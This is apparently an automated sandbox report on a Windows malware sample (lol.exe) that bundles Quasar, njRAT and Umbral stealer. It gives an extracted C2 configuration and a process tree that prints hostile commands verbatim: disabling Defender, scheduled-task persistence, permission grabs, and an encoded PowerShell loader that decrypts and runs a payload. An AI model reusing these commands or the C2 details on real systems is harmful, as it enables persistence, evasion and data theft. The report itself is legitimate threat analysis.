Overview

overview

10

Static

static

10

lol.exe

windows11-21h2-x64

Analysis

  • max time kernel
    478s
  • max time network
    482s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-05-2024 15:35

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    lol.exe

  • Size

    13.1MB

  • MD5

    621d4a616715d165ed2c10e48e5fd94b

  • SHA1

    7fabfdb5167e59d0442df460e1b236cb5bc75fbe

  • SHA256

    7975eec3959bed57e86fb6fa917503a7a1242fdf589dde7600783fc37d3dfbde

  • SHA512

    793302845e76e8cc03bd8281abad4db786f361e5c1a691462b40da11e8e7ac6210e0e9c21b41493dedffc6724af146ef70b9f8448d51dc860725364e14cba442

  • SSDEEP

    196608:tbVYKe7PjQhn5EQ9hNQAYzA5k6cTWDn7JKObS09Vp7j1oTeBI7lm:pzuA5EWheYkv8LlCTe2s

Score
10/10
njratquasarumbralromkabootkitdiscoveryevasionexecutionpersistencespywarestealertrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Detect Umbral payload 1 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
    evasion
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
    evasion
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Windows security bypass 2 TTPs 5 IoCs
    evasiontrojan
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Disables RegEdit via registry modification 1 IoCs
    evasion
  • Drops file in Drivers directory 1 IoCs
  • Manipulates Digital Signatures 1 IoCs

    Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

  • Sets file execution options in registry 2 TTPs 16 IoCs
    persistence
  • .NET Reactor proctector 35 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Executes dropped EXE 21 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Registers COM server for autorun 1 TTPs 6 IoCs
    persistence
  • Windows security modification 2 TTPs 6 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • AutoIT Executable 11 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 19 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 4 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 56 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 18 IoCs
  • Modifies registry class 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 62 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 29 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\lol.exe
    "C:\Users\Admin\AppData\Local\Temp\lol.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:236
    • C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\loader.exe
      "C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\loader.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3568
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\temp.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5056
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K main.cmd
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:564
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im WindowsDefender.exe
            5⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4420
          • C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\Rover.exe
            Rover.exe
            5⤵
            • Modifies WinLogon for persistence
            • UAC bypass
            • Drops file in Drivers directory
            • Manipulates Digital Signatures
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Writes to the Master Boot Record (MBR)
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • System policy modification
            PID:1360
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\web.htm
            5⤵
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3108
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff826ce3cb8,0x7ff826ce3cc8,0x7ff826ce3cd8
              6⤵
                PID:2952
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
                6⤵
                  PID:2260
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2788
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
                  6⤵
                    PID:3656
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1
                    6⤵
                      PID:3308
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
                      6⤵
                        PID:3576
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
                        6⤵
                          PID:592
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
                          6⤵
                            PID:4896
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3892 /prefetch:1
                            6⤵
                              PID:5216
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:1
                              6⤵
                                PID:1180
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8
                                6⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:6120
                              • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
                                6⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3400
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
                                6⤵
                                  PID:4740
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\helper.vbs"
                                5⤵
                                  PID:3952
                                • C:\Program Files\Internet Explorer\iexplore.exe
                                  "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\spinner.gif
                                  5⤵
                                  • Modifies Internet Explorer settings
                                  PID:4936
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 15
                                  5⤵
                                  • Delays execution with timeout.exe
                                  PID:4632
                                • C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\scary.exe
                                  scary.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5604
                                  • C:\Windows\SYSTEM32\schtasks.exe
                                    "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                    6⤵
                                    • Creates scheduled task(s)
                                    PID:5368
                                  • C:\Program Files\SubDir\Romilyaa.exe
                                    "C:\Program Files\SubDir\Romilyaa.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    • Suspicious use of SetWindowsHookEx
                                    PID:5700
                                    • C:\Windows\SYSTEM32\schtasks.exe
                                      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                      7⤵
                                      • Creates scheduled task(s)
                                      PID:5888
                                • C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\the.exe
                                  the.exe
                                  5⤵
                                  • Executes dropped EXE
                                  PID:5360
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5368
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /f /im taskmgr
                                  5⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5988
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /f /im explorer
                                  5⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5540
                                • C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\ac3.exe
                                  ac3.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  PID:5900
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /f /im fontdrvhost
                                  5⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5984
                                • C:\Windows\system32\icacls.exe
                                  icacls c:\Windows\explorer.exe /grant Admin:(F,M)
                                  5⤵
                                  • Modifies file permissions
                                  PID:4240
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 15
                                  5⤵
                                  • Delays execution with timeout.exe
                                  PID:3832
                                • C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\jaffa.exe
                                  jaffa.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:5652
                                  • C:\Windows\SysWOW64\ccqytjrniv.exe
                                    ccqytjrniv.exe
                                    6⤵
                                    • Modifies visibility of file extensions in Explorer
                                    • Modifies visiblity of hidden/system files in Explorer
                                    • Windows security bypass
                                    • Disables RegEdit via registry modification
                                    • Executes dropped EXE
                                    • Windows security modification
                                    • Enumerates connected drives
                                    • Modifies WinLogon
                                    • Modifies registry class
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:796
                                    • C:\Windows\SysWOW64\xpxlzrjv.exe
                                      C:\Windows\system32\xpxlzrjv.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Enumerates connected drives
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:5580
                                  • C:\Windows\SysWOW64\sphkjhlphydlbbz.exe
                                    sphkjhlphydlbbz.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:1768
                                  • C:\Windows\SysWOW64\xpxlzrjv.exe
                                    xpxlzrjv.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Enumerates connected drives
                                    • Drops file in Windows directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:2784
                                  • C:\Windows\SysWOW64\oxurcpmxhhmap.exe
                                    oxurcpmxhhmap.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:3308
                                  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
                                    6⤵
                                    • Checks processor information in registry
                                    • Enumerates system info in registry
                                    • Suspicious behavior: AddClipboardFormatListener
                                    • Suspicious use of SetWindowsHookEx
                                    PID:5716
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 15
                                  5⤵
                                  • Delays execution with timeout.exe
                                  PID:5952
                          • C:\Users\Admin\AppData\Local\Temp\0693d3b6-dec7-4180-915f-a8d126a4fb67\packer.exe
                            "C:\Users\Admin\AppData\Local\Temp\0693d3b6-dec7-4180-915f-a8d126a4fb67\packer.exe" "C:\Users\Admin\AppData\Local\Temp\0693d3b6-dec7-4180-915f-a8d126a4fb67\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\lol.exe" "loader.exe" "C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5" "" True True False 1 -repack
                            2⤵
                            • Executes dropped EXE
                            PID:5048
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 1324
                              3⤵
                              • Program crash
                              PID:5952
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:4896
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:1944
                            • C:\Windows\system32\AUDIODG.EXE
                              C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004C0
                              1⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5444
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5048 -ip 5048
                              1⤵
                                PID:1460
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:5668
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                  1⤵
                                    PID:1812
                                  • C:\Windows\system32\msinfo32.exe
                                    "C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\Desktop\UninstallSubmit.nfo"
                                    1⤵
                                    • Checks SCSI registry key(s)
                                    • Enumerates system info in registry
                                    PID:5976
                                  • C:\Program Files\VideoLAN\VLC\vlc.exe
